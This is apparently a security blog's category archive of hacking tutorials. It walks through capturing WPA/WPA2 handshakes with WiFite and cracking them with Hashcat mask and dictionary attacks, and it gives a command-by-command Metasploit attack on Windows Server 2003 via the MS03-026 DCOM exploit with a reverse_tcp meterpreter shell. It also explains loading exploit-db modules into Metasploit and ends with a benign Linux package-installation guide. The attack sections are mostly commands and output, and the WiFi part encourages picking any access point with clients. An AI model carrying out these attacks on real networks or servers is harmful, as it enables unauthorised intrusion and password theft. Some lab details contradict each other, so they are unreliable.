Category Archives: SYSTEM

THE SYSTEM RELATED HACKS TIPS TRICKS

CRACKING WiFi WPA WPA2 WITH HASHCAT ON KALI LINUX (BRUTEFORCE MASK BASED ATTACK ON WIFI PASSWORDS)

Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords)

cudaHashcat or oclHashcat or Hashcat on Kali Linux got built-in capabilities to attack and decrypt or crack WPA WPA2 handshake.cap files. Only constraint is, you need to convert a .cap file to a.hccap file format. This is rather easy.

Important Note: Many users try to capture with network cards that are not supported. You should purchase a card that supports Kali Linux including injection and monitor mode etc. A list can be found in802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card, otherwise you’ll be just wasting time and effort on something that just won’t do the job.
[toc]

My Setup

I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for most of the exercise. In this post, I will show How to crack WPA/WPA2 handshake file (.cap files) with cudaHashcat or oclHashcat or Hashcat on Kali Linux.

I will use cudahashcat command because I am using a NVIDIA GPU. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Let me know if this assumptions is incorrect.

Why use Hashcat to crack WPA/WPA2 handshake file?

Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files?

  1. Because we can?
  2. Because Hashcat allows us to use customized attacks with predefined rules and Masks.

Now this doesn’t explain much and reading HASHCAT Wiki will take forever to explain on how to do it. I’ll just give some examples to clear it up.

Hashcat allows you to use the following built-in charsets to attack a WPA/WPA2 handshake file.

Built-in charsets

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !”#$%&'()*+,-./:;⇔?@[]^_`{|}~

?a = ?l?u?d?s

Numbered passwords

So lets say you password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d

What it means is that you’re trying to break a 8 digit number password like 12345678 or 23456789 or 01567891.. You get the idea.

Letter passwords – All uppercase

If your password is all letters in CAPS such as: ABCFEFGH orLKHJHIOP or ZBTGYHQS ..etc. then you can use the following MASK:

?u?u?u?u?u?u?u?u

It will crack all 8 Letter passwords in CAPS.

Letter passwords – All lowercase

If your password is all letters in lowercase such as: abcdefgh ordfghpoiu or bnmiopty..etc. then you can use the following MASK:

?l?l?l?l?l?l?l?l

It will crack all 8 Letter passwords in lowercase. I hope you now know where I am getting at.

Passwords – Lowercase letters and numbers

If you know your password is similar to this: a1b2c3d4 or p9o8i7u6or n4j2k5l6 …etc. then you can use the following MASK:

?l?d?l?d?l?d?l?d

Passwords – Uppercase letters and numbers

If you know your password is similar to this: A1B2C3D4 or P9O8I7U6or N4J2K5L6 …etc. then you can use the following MASK:

?u?d?u?d?u?d?u?d

Passwords – Mixed matched with uppercase, lowercase, number and special characters.

If you password is all random, then you can just use a MASK like the following:

?a?a?a?a?a?a?a?a

Note: ?a represents anything …. I hope you’re getting the idea.

If you are absolutely not sure, you can just use any of the predefined MASKs file and leave it running. But yeah, come back to check in a million years for a really long password …. Using a dictionary attack might have more success in that scenario.

Passwords – when you know a few characters

If you somehow know the few characters in the password, this will make things a lot faster. For every known letter, you save immense amount of computing time. MASK’s allows you to combine this. Let’s say your 8 character password starts with abc, doesn’t contain any special characters. Then you can create a MASK rule file to contain the following:

abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l

There will be 125 combinations in this case. But it will surely break it in time. This is the true power of using cudaHashcat or oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords.

You can even up your system if you know how a person combines a password. Some people always uses UPPERCASE as the first character in their passwords, few lowercase letters and finishes with numbers.

ExampleAbcde123

Your mask will be:

?u?l?l?l?l?d?d?d

This will make cracking significantly faster. Social engineering is the key here.

That’s enough with MASK’s. Now let’s capture some WPA/WPA2 handshake files.

Capture handshake with WiFite

Why WiFite instead of other guides that uses Aircrack-ng? Because we don’t have to type in commands..

Type in the following command in your Kali Linux terminal:

wifite –wpa

You could also type in

wifite wpa2

If you want to see everything, (wepwpa or wpa2, just type the following command. It doesn’t make any differences except few more minutes

wifite

Once you type in following is what you’ll see.

1 - Wifite - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

So, we can see bunch of Access Points (AP in short). Always try to go for the ones with CLIENTS because it’s just much faster. You can choose all or pick by numbers. See screenshot below

2 - Wifite Screen - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Awesome, we’ve got few with clients attached. I will pick 1 and 2 cause they have the best signal strength. Try picking the ones with good signal strength. If you pick one with poor signal, you might be waiting a LONG time before you capture anything .. if anything at all.

So I’ve picked 1 and 2. Press Enter to let WiFite do it’s magic.

3 - WiFite Choice - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Once you press ENTER, following is what you will see. I got impatient as the number 1 choice wasn’t doing anything for a LONG time. So I pressed CTRL+C to quit out of it.

This is actually a great feature of WIfite. It now asks me,

What do you want to do?

  1. [c]ontinue attacking targets
  2. [e]xit completely.

I can type in c to continue or e to exit. This is the feature I was talking about. I typed c to continue. What it does, it skips choice 1 and starts attacking choice 2. This is a great feature cause not all routers or AP’s or targets will respond to an attack the similar way. You could of course wait and eventually get a respond, but if you’re just after ANY AP’s, it just saves time.

4 - WiFite continue - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

And voila, took it only few seconds to capture a handshake. This AP had lots of clients and I managed to capture a handshake.

This handshake was saved in /root/hs/BigPond_58-98-35-E9-2B-8D.cap file.

Once the capture is complete and there’s no more AP’s to attack, Wifite will just quit and you get your prompt back.

5 - WiFite captured handshake - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Now that we have a capture file with handshake on it, we can do a few things.

Cleanup your cap file using wpaclean

Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand.

Here’s how to do it:

To convert your .cap files manually in Kali Linux, use the following command

wpaclean <out.cap> <in.cap>

Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion.

In my case, the command is as follows:

wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap

Convert .cap file to .hccap format

We need to convert this file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux can understand.

To convert it to .hccap format with “aircrack-ng” we need to use the -J option

aircrack-ng <out.cap> -J <out.hccap>

Note the -J is a capitol J not lower case j.

In my case, the command is as follows:

aircrack-ng hs/out.cap -J hs/out

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 1

Cracking WPA/WPA2 handshake with Hashcat

cudaHashcat or oclHashcat or Hashcat on Kali Linux is very flexible, so I’ll cover two most common and basic scenarios:

  1. Dictionary attack
  2. Mask attack

Dictionary attack

Grab some Wordlists, like Rockyou.

Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc.

First we need to find out which mode to use for WPA/WPA2 handshake file. I’ve covered this in great length in Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linuxguide. Here’s a short rundown:

cudahashcat --help | grep WPA

So it’s 2500.

Now use the following command to start the cracking process:

cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 2

Bingo, I used a common password for this Wireless AP. Took me few seconds to crack it. Depending on your dictionary size, it might take a while.

You should remember, if you’re going to use Dictionary attack, Pyrit would be much much much faster than cudaHashcat or oclHashcat or Hashcat. Why we are showing this here? Cause we can. 🙂

Another guide explains how this whole Dictionary attack works. I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary related attacks in full length.

Brute-Force Attack

Now this is the main part of this guide. Using Brute Force MASK attack.

To crack WPA WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command:

Sample:

cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

Where -m = 2500 means we are attacking a WPA/WPA2 handshake file.

-a = 3 means we are using Brute Force Attack mode (this is compatible with MASK attack).

capture.hccap = This is your converted .cap file. We generated it using wpaclean and aircrack-ng.

?d?d?d?d?d?d?d?d = This is your MASK where d = digit. That means this password is all in numbers. i.e. 7896435 or 12345678etc.

I’ve created a special MASK file to make things faster. You should create your own MASK file in similar way I explained earlier. I’ve saved my file in the following directory as blackmoreops-1.hcmask.

/usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Do the following to see all available default MASK files provided by cudaHashcat or oclHashcat or Hashcat:

ls /usr/share/oclhashcat/masks/

In my case, the command is as follows:

cudahashcat -m 2500 -a 3 /root/hs/out.hccap  /usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 3

Sample .hcmask file

You can check the content of a sample .hcmask file using the following command:

tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 4

Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip.

Location of Cracked passwords

Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory.

cat hashcat.pot

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 5

802.11 Recommended USB Wireless Cards for Kali Linux

802.11 Recommended USB Wireless Cards for Kali Linux

This post lists some of the best performing, supported and recommended USB Wireless Cards for Kali Linux.

There isn’t a “best” card. There is whatever is right for YOU.

Following recommended USB Wireless cards appears to be working for Kali Linux (i.e. monitor, injection etc.)

*Note* These are not in any type of order *Note*

A common problem in pentest distro such as Kali or BackTrack Linux is when users trying to use a card which is not supported or there just isn’t a supported driver. Most of the following cards are priced below $50USD and they take care of a massive headache and saves time to troubleshoot driver issues rather than investing time to actually do something. With each update these makeshift fixes seems to break old drivers and you end up doing the whole thing again and again. Following guide generated a lot of emails and personal request where users were not able to make it work properly just because their Wifi card wasn’t listed in the recommended wireless cards for Kali Linux.

2.4GHz

 

Rokland N3

http://store.rokland.com/products/th…b-for-macs-pcs

$32.97 off Rockland

 

Alfa AWUS036NHA

http://www.alfa.com.tw/products_show.php?pc=34&ps=20

$32.99 off Amazon

 

TP-Link WN722N

http://uk.tp-link.com/products/detai…TL-WN722N#spec

$15.18 off Amazon

 

Linksys WUSB54GC v1

http://support.linksys.com/en-us/support/adapters/WUSB54GC

25.00$ off Amazon

 

5GHz (& 2.4GHz)

 

Rosewill RNX-N600UBE

http://www.rosewill.com/products/182…ifications.htm

$32.66 off Amazon

 

Other useful links

As the price will change over time and from country to country, it’s missing on purpose. Places that have been known to stock the mentioned cards:

If you have a different card feel free to share here which will probably help another user someday.

Side Note:

I’ve compiled a small list (These are the only 8 laptops that I could find to match my personal choices) that are Linux compatible and have NVIDIA GeForce Graphics cards. (I’ve tried to avoid AMD/ATI as there’s been some inconsistency lately with their Linux proprietary drivers and heating issues, sorry AMD, take Linux users more seriously next time). NVIDIA seems more stable and gives you more options … Feel free to check this list and add comments about which one you have or prefer…

 

“No responsibility is taken for the correctness of this information.” == Double check before purchasing.

 

Conclusion

or maybe you would like to turn a Kindle Device in your Portable Kali installation ? The possibilities are endless …

HOW TO HACK WINDOWS 2003 SERVER WITH METASPLOIT

How to pentest Remote PC (Windows 2003 server) with Metasploits - blackMORE Ops

This is a a detailed step by step guide on How to pentest Remote PC (Windows 2003 server) with Metasploits. I’ve used BackTrack 5 and Windows 2003 server in a virtual environment. The ease of pentesting is scary and readers, sysadmins are advised to update their Windows 2003 server to the latest patch/service pack and use additional antivirus, firewalls to protect them from similar situation. The author takes no responsibility on how this tutorial is being used by readers and this is for educational purpose only.

Introduction

Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

http://www.backtrack-linux.org/downloads/

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

  1. The msfconsole,
  2. The msfcli interface and
  3. The msfweb interface.

However, the primary and the most preferred work area is the‘msfconsole’. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

  1. search : Typing in the command search along with the keyword lists out the various possible exploits that have that keyword pattern.
  2. show exploits : Typing in the command show exploits‘ lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.
  3. show payloads : With the same ‘show‘ command, we can also list the payloads available. We can use a ‘show payloads’ to list the payloads.
  4. show options : Typing in the command ‘show options‘ will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.
  5. info : If you want specific information on an exploit or payload, you are able to use the ‘info’ command. Let’s say we want to get complete info of the payload ‘winbind’. We can use ‘info payload winbind‘.
  6. use : This command tells Metasploit to use the exploit with the specified name
  7. set RHOST : This command will instruct Metasploit to target the specified remote host.
  8. set RPORT : This command sets the port that Metasploit will connect to on the remote host.
  9. set PAYLOAD : This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.
  10. set LPORT : This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server (i.e.it is not in use by another service and not reserved for administrative use), so set it to a random 4 digit number greater than 1024, and you should be fine. You’ll have to change the number each time you successfully exploit a service as well.
  11. exploit : Actually exploits the service. Another version of exploit,rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console
  12. help : The ‘help’ command will give you basic information of all the commands that are not listed out here.

Now that you are ready with all the basic commands you need to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003
IP: IP: 192.168.42.128

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev
IP: 192.168.42.128

Objective

The only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server 192.168.42.129.
The output of the nmap scan shows us a range of ports open which can be seen below in Figure 1.

Step 1 – Scan with nmap for open ports - blackMORE Ops

Figure 1

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Step 2 – Open msfconsole - blackMORE Ops

Figure 2

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Step 2 – Open msfconsole-2 - blackMORE Ops

Figure 3

Step 3 – Search RPC exploit in Metasploit

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.
To list out all the exploits supported by Metasploit we use the “show exploits” command. This exploit lists out all the currently available exploits and a small portion of it is shown below in Figure 4.

Step 3 – Search RPC exploit in Metasploit - blackMORE Ops

Figure 4

As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link http://metasploit.com/modules/or another alternative would be to use the “search” command in Metasploit to search for related exploits for RPC.
In msfconsole type “search dcerpc” to search all the exploits related todcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in Figure 5.

Step 3 – Search RPC exploit in Metasploit-2 - blackMORE Ops

Figure 5

Step 4 – Gather info about target exploit

Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command “info exploit/windows/dcerpc/ms03_026_dcom” which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.

Step 4 – Gather info about target exploit - blackMORE Ops

Figure 6

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Step 5 – Activate exploit - blackMORE Ops

Figure 7

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The “show options” command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.
We enter the command “set RHOST 192.168.42.129” and we see that the RHOST is set to 192.168.42.129

Step 6 – Configure exploit - blackMORE Ops

Figure 8

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Step 7 – Set payload for exploit - blackMORE Ops

Figure 9

For our case, we are using the reverse tcp meterpreter which can be set using the command, “set PAYLOAD windows/meterpreter/reverse_tcp” which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using “show options” to make sure all the compulsory sections are properly filled so that the exploit is launched properly

Step 7 – Set payload for exploit-2 - blackMORE Ops

Figure 10

We notice that the LHOST for out payload is not set, so we set it toout local IP ie. 192.168.42.128 using the command “set LHOST 192.168.42.128

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In out case as shown in the Figure below, our selected exploit does not support the check option.

Step 8 – Launch exploit and establish connection - blackMORE Ops

Figure 11

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Step 8 – Launch exploit and establish connection-2 - blackMORE Ops

Figure 12

The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 due to the vulnerable port 135.

This is indicated by change in prompt to “meterpreter >“.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server.

We can use the help command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below Figure.

Below are the results of some of the meterpreter commands.

Step 9 – Perform an action on pentested server - blackMORE Ops

Figure 13

Step 9 – Perform an action on pentested server-2 - blackMORE Ops

Add new exploits to Metasploit from Exploit-db

All this timeAll this time you were just using mainstream exploits which were famous but old. They worked well, but only with old unpatched operating systems, not the updated ones. Now it’s time to move on to the next step. Our poor experience against Windows 8 and Java 7u60 left us shattered, and we realized that fully patched and updated machines with strong antivirus and firewall can be pretty  hard to break into. Now we will move into the world of real pentesting, and the first step would be introduction to exploit-db.




Exploit-db

As usual, a few official words from the developers before I express my personal views.

The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. (offensive security)

Some more

The Exploit Database is a CVE-Compatible Database and (where applicable) CVE numbers are assigned to the individual exploit entries in the database. The public database archive does not contain the mapped CVE numbers, but we make them available to our partnering organizations, making links to The Exploit Database entries available within their products.
As many exploit developers lament, it is frequently more difficult to locate a vulnerable application than it is to take a public proof of concept and change it into a working exploit. For this reason, The Exploit Database also hosts the vulnerable application versions whenever possible.
In addition, the team of volunteers that maintain the site also make every effort to verify the submitted exploits and a visual indicator is provided whether or not a successful verification was performed. (Offensive Security)


Now, what exploit db really is, is nothing more than a database where the pentestors who write an exploit for a vulnerability upload the source code of the exploit of other pentestors too see. It is maintained by Offensive Security (the force behind Backtrack, Kali, Metasploit Unleashed). The exploit-db.com site itself is pretty easy to navigate, and you can find all sorts of exploits there. Just finding an exploit, however, is not enough, as you need to add it to Metasploit in order to use it. 

Adobe Flash Player Shader Buffer Overflow

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8. (rapid7)

Now the site suggest that the exploit can be found here.

exploit/windows/browser/adobe_flash_pixel_bender_bof

But using the command

use exploit/windows/browser/adobe_flash_pixel_bender_bof

shows that the exploit is not in Metasploit yet (chances are good it’s there if you update metasploit regularly or if you are reading this tutorial a long time after it was written. Either ways, the method will not differ even if the exploit is already there, so don’t worry. Also you can use a different exploit as per your liking, and just replace the name wherever you see it being used in commands)

Now, there are two alternates. First, update the metasploit framework using 

 

msfupdate

This will update the framework with new modules.

The second alternate the to download the exploit from exploit-db, then put it in the ~/.msf4/modules/exploit/<your_folder> directory. Any exploit put here will be detected my Metasploit when it starts. It will show up when you type use /exploit/your_folder/exploit_name. An important point here is while the <your_folder is arbitrary  and can be set to any value, it is recommended to use a proper directory structure. For example, this exploit should be placed in~/.msf4/modules/exploit/windows/browser/ directory .Also, it is mandatory to place exploits in a subdirectory of ~/.msf4/modules/exploit/ or you won’t be able to use it. For newbies in Linux, here is a detailed step by step guide.

Get the exploit

For examples sake, we’ll use the adobe shader exploit from http://www.exploit-db.com/exploits/33333/ Click on the Save icon to download the exploit. Save it on you Kali Desktop.

.msf4 directory method

Now if you are not well versed with linux, you will need help with creating the directory and placing files there. Although I’m guiding you how to do it, you should be proficient in linux usage and should be able to do the basic stuff like this atleast. So, you can either use the command to line create the directories or do it using the GUI.

Command line method

First, say hi to mkdir

mkdir –help
Usage: mkdir [OPTION]… DIRECTORY…
Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.
  -m, –mode=MODE   set file mode (as in chmod), not a=rwx – umask
  -p, –parents     no error if existing, make parent directories as needed
  -v, –verbose     print a message for each created directory
  -Z, –context=CTX  set the SELinux security context of each created
                      directory to CTX
      –help     display this help and exit
      –version  output version information and exit

First we’ll move to the already existent directory using (you need to be in root directory for this to work. Type just cd if unsure, it will automatically take you to root directory)root@kali:~# cd .msf4/modules/    
To see what the directory has, execute ls. It will return nothing as the directory is empty.

root@kali:~/.msf4/modules# ls
Now we’ll use mkdir to create what we need.
root@kali:~/.msf4/modules# mkdir exploits
root@kali:~/.msf4/modules# cd exploits
root@kali:~/.msf4/modules/exploits# mkdir windows        
root@kali:~/.msf4/modules/exploits# cd windows
root@kali:~/.msf4/modules/exploits/windows# mkdir browser
root@kali:~/.msf4/modules/exploits/windows# cp      
If you read the mkdir help thing, you might have noticed the -p option. It makes everything much easier. Everything above can be achieved with something as simple as
root@kali:~# mkdir -p ~/.msf4/modules/exploits/windows/browser
Now meet cp
root@kali:~/.msf4/modules/exploits/windows# cp –help
Usage: cp [OPTION]… [-T] SOURCE DEST
  or:  cp [OPTION]… SOURCE… DIRECTORY
  or:  cp [OPTION]… -t DIRECTORY SOURCE…
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.
Assume you have adobe_flash_pixel_bender_bof.rb file on your desktop. Then use the following commands.
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows
root@kali:~# ls 
Desktop  app.apk
root@kali:~# cd Desktop
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows/browser
Now check for yourself
root@kali:~# cd ~/.msf4/modules/exploits/windows/browser
root@kali:~/.msf4/modules/exploits/windows/browser# ls
adobe_flash_pixel_bender_bof.rb

GUI Method

Go to computer -> Filesystem->Home. Now you won’t see .msf4 there, because the . prefix is for hidden files. So go to view and select show hidden items. Now it will be visible.





Now the rest is going to be a piece of cake. Copy the exploit from desktop, and create the directories by using the easy peasy right click -> New folder method. After that just paste the file where it needs to be. You’ll be done. Now start msfconsole again or type reload_all to reload the module. This will add the module to metasploit and you can use it as you normally would.

Installing new software on Linux (Debian, Red Hat, Slackware)

Installing new software on Linux (Debian, Red Hat, Slackware)

Debian:
There are various methods to installing new programs on a Debian system. I like to classify them according to your connection type.

Code:
dpkg

This is the “classic” way of updating a Debian system. Typically, you could go to Debian’s website or any one of its mirrors and download a package.

Code:
dpkg -i package.deb

to install it.

The main drawback to this is that you may find a package that you like but it may have dependencies (ie. other programs that it needs to make it run) and if you don’t have those packages, then the install will fail.

This is what the Debian people themselves have to say about this method:

Many people find this approach much too time-consuming, since Debian evolves so quickly — typically, a dozen or more new packages are uploaded every week. This number is larger just before a new major release. To deal with this avalanche, many people prefer to use automated programs.

Despite what they say, the main advantage of dpkg, it seems to me, is that it is easy for people who have dial-up connections. This is because the alternative, automated programs they’re talking about, which are dselect and apt-get are better for permanent connections (cable, xDSL, T1, T3). Let’s talk about this method of installing new programs with Debian.

Code:
dselect

When you use dselect you get a graphic user interface of sorts (not under X window, though) to guide you through the install of new programs.

First you’ll get asked for your preferred access method. That means, how you’re going to get and install them. For example, if I were doing an install of Debian with CDs, then I would choose CD-ROM. But if I were updating, I would choose FTP

Then you would choose the packages you want with a + sign. You can even put updates on hold (indicate that you want to update, but not actually do it) with a = sign. There may even be conflicts or dependency problems and ‘dselect’ will warn you about those.

Then you start the process by choosing the install option.

Debian will then configure the installed packages.

Then you’re on your way.

As I said before, the main advantage to this is that any conflicts or dependency problems will be resolved right here. The Debian people point out that this is ideal for installs or large-scale upgrades. If that’s the case, it seems that a slow and sometimes expensive dial-up connection would be less than ideal for this.

Red Hat:
The way you install a new program will depend primarily on two things:

1) What distribution (version) of Linux are you using?
2) What is the origin of the program that you want to install?

RPM

If you’re using Red Hat or a distribution that bases itself on Red Hat, then you’re going to use the RPM method. OK racing fans- RPM doesn’t have anything to do with revolutions per minute. It stands for Red Hat PackageManager. This system takes the heartache out of installing programs under Linux, for the most part. You can go to the Red Hat website or any number of mirrors and get programs for Linux. Developers will almost always offer their programs in RPM format due to its popularity. I also want to note that RPM has also come to mean the package itself (as in &quot;I downloaded an RPM yesterday&quot;).

There are some basic commands you’re going to need to know to take advantage of the RPM system.

Code:
rpm -i new_program.rpm

This installs the program (-i option for install)

Code:
rpm -q program_name

This &quot;queries&quot; your system to see if you’ve got a certain program installed. Let’s say you hear there’s a new version of the popular Internet browser Opera for Linux and you don’t know if your Red Hat based distribution installs this by default or not. Before you download the RPM for Opera, you could type the command:

Code:
rpm -q opera

If you do have the package installed, it would give you the version number:

opera-11.62

If you don’t have the package installed, you will see:

package opera is not installed

If you don’t have Opera installed, then you can download their RPM and run rpm -i opera_whatever_version.rpm as root and install the program.

If you do have the program installed and the rpm -q opera command gives you a older version number and you want the newerone, then you have two options.

One is to “uninstall” the older package and install a new one in its place. Not that this is the most efficient option. I just wanted to introduce you to the -e option for RPM. That is, to get rid of a program that you’ve installed, you would type rpm -e program_name. For example, if you’ve got Opera’s beta version 7 and you’ve just downloaded the beta version 8, then you would first do:

Code:
rpm -e opera

This gets rid of Opera from your system. Then you would type rpm -i opera_beta8.rpm (or whatever the package is actually called). That installs the new version.

As I said, this is not the most efficient way to update packages. The usual way is to use the -U (as inUpdate command.

You would type:

Code:
rpm -U opera_new_version.rpm

and that would install the new version and remove the old version from your system.

Those are the basic commands of the RPM install/update system in a nutshell.

When you’re using your windows manager, there are some very good tools for installing, updating and uninstalling RPMs that are graphically based. You can choose menu options to do all that we explained before instead of having to type the commands in the terminal. You may want to look into programs like Kpackage for KDE orGnome RPM for the GNOME enviroment. They may make these tasks a lot easier, especially if you’re just starting out in the Linux world.

Some words of caution on downloading RPMs

Some of the most popular Linux distributions base their install and update prodedures on Red Hat’s package management system. These include Mandrake and SuSE for example. Both of these companies create their own RPMs to be specifically installed on their systems. That means if you’re using SuSE or Mandrake your best bet is to go to their respective &quot;official&quot; websites or mirrors and download their particular RPM and install it using the procedure outlined above or their specific tools. You may run into a problem if you installed an RPM for Red Hat on a SuSE system. Certain components in the package (like documentation or libraries) may get copied into a different directory than was intended for that system. Third party RPMs from reputable companies, like the Opera web browser in mentioned above, should install fine on any RPM based system. I have successfully installed this package (the same exact RPM file) on SuSE, Mandrake and Red Hat. I even converted this RPM to Debian (.deb) package format and successfully installed it in a computer running Debian. More on this conversion later in the show!

Just a brief second word of caution. Getting and RPM doesn’t necessarily mean that you’re automatically (or “auto-magically”) going to be able to install it. Many websites out there offer RPMs for download. The good ones usually include a list on that particular RPM’s page of other programs or libraries that you need in order successfully install and use the program. If you see a list a mile long of “requirements” (those other programs and libraries you need), then you might want to ask yourself if you really want to try that program out.

And here’s just an editorial comment on my part about this type of thing as well. The big buzz word with Linux is “free”. That’s fine. You can theoretically get a distribution from the Internet along with programs and install it for free. (ie. no money down). I think, however, that time is money, to use the trite expression. Time might be even more valuable than money. (lost money might be re-earned but not lost time). When I first installed Linux oh so many years ago, updating and installing stuff was at times a frustrating experience. I suggest that newcomers to the Linux world buy (yes, I said buy) a good boxed set of a commercial distribution and then they’ll have more programs than they would ever need, all installed and working properly along with a manual to tell you what to doin case something doesn’t work.

Code:
yum

